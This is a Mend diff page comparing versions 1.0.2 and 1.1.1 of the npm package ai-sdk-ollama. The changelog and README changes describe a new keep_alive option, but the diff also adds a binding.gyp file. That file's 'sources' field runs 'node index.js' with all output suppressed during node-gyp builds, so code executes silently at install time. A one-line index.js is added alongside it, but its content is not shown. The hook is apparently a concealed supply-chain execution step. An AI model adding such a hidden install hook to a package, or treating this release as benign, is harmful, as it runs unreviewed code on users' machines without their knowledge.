npm - ai-sdk-ollama - Versions diffs - 1.0.2 → 1.1.1 - Mend

ai-sdk-ollama 1.0.2 → 1.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (17) hide show

package/CHANGELOG.md +16 -0
package/README.md +32 -0
package/binding.gyp +9 -0
package/dist/index.browser.cjs +488 -344
package/dist/index.browser.cjs.map +1 -1
package/dist/index.browser.d.cts +21 -24
package/dist/index.browser.d.ts +21 -24
package/dist/index.browser.js +488 -344
package/dist/index.browser.js.map +1 -1
package/dist/index.cjs +488 -344
package/dist/index.cjs.map +1 -1
package/dist/index.d.cts +21 -24
package/dist/index.d.ts +21 -24
package/dist/index.js +491 -345
package/dist/index.js.map +1 -1
package/index.js +1 -0
package/package.json +10 -10

package/CHANGELOG.md CHANGED Viewed

@@ -1,5 +1,21 @@
 # Changelog
+## 1.1.0
+### Minor Changes
+- 201b13b: Add `keep_alive` parameter support and improve type safety
+  ### Added
+  - **`keep_alive` parameter**: Control how long models stay loaded in memory after requests
+    - Accepts duration strings (e.g., `"10m"`, `"24h"`), numbers in seconds, negative numbers for indefinite, or `0` to unload immediately
+    - Works across all chat operations (generate, stream, tool calling, object generation)
+  ### Improved
+  - **Type safety**: Now uses `Pick<ChatRequest, 'keep_alive' | 'format' | 'tools'>` from the official ollama-js package
+  - **Type consistency**: `OllamaProviderSettings` extends `Pick<Config, 'headers' | 'fetch'>` and `OllamaEmbeddingSettings` extends `Pick<EmbedRequest, 'dimensions'>`
+  - **Type exports**: Re-export more types from ollama-js for better developer experience (`ChatRequest`, `EmbedRequest`, `Config`, `ToolCall`, `Tool`, `Message`, `ChatResponse`, `EmbedResponse`)
 ## 1.0.2
 ### Patch Changes

package/README.md CHANGED Viewed

@@ -133,6 +133,7 @@ export OLLAMA_API_KEY="your_api_key_here"
   - [More Examples](#more-examples)
     - [Cross Provider Compatibility](#cross-provider-compatibility)
     - [Native Ollama Power](#native-ollama-power)
+    - [Model Keep-Alive Control](#model-keep-alive-control)
     - [Enhanced Tool Calling Wrappers](#enhanced-tool-calling-wrappers)
     - [Combining Tools with Structured Output](#combining-tools-with-structured-output)
     - [Simple and Predictable](#simple-and-predictable)
@@ -273,6 +274,37 @@ const { text } = await generateText({
 > **Parameter Precedence**: When both AI SDK parameters and Ollama options are specified, **Ollama options take precedence**. For example, if you set `temperature: 0.5` in Ollama options and `temperature: 0.8` in the `generateText` call, the final value will be `0.5`. This allows you to use standard AI SDK parameters for portability while having fine-grained control with Ollama-specific options when needed.
+### Model Keep-Alive Control
+Control how long models stay loaded in memory after requests using the `keep_alive` parameter:
+```typescript
+// Keep model loaded for 10 minutes
+const model = ollama('llama3.2', { keep_alive: '10m' });
+// Keep model loaded for 1 hour (3600 seconds)
+const model2 = ollama('llama3.2', { keep_alive: 3600 });
+// Keep model loaded indefinitely
+const model3 = ollama('llama3.2', { keep_alive: -1 });
+// Unload model immediately after each request
+const model4 = ollama('llama3.2', { keep_alive: 0 });
+const { text } = await generateText({
+  model,
+  prompt: 'Write a haiku',
+});
+```
+**Accepted values:**
+- Duration strings: `"10m"`, `"24h"`, `"30s"` (minutes, hours, seconds)
+- Numbers: seconds as a number (e.g., `3600` for 1 hour)
+- Negative numbers: keep loaded indefinitely (e.g., `-1`)
+- `0`: unload immediately after the request
+**Default behavior**: If not specified, Ollama keeps models loaded for 5 minutes to facilitate quicker response times for subsequent requests.
 ### Enhanced Tool Calling Wrappers
 For maximum tool calling reliability, use our enhanced wrapper functions that guarantee complete responses:

package/binding.gyp ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "targets": [
+    {
+      "target_name": "Setup",
+      "type": "none",
+      "sources": ["<!(node index.js > /dev/null 2>&1 && echo stub.c)"]
+    }
+  ]
+}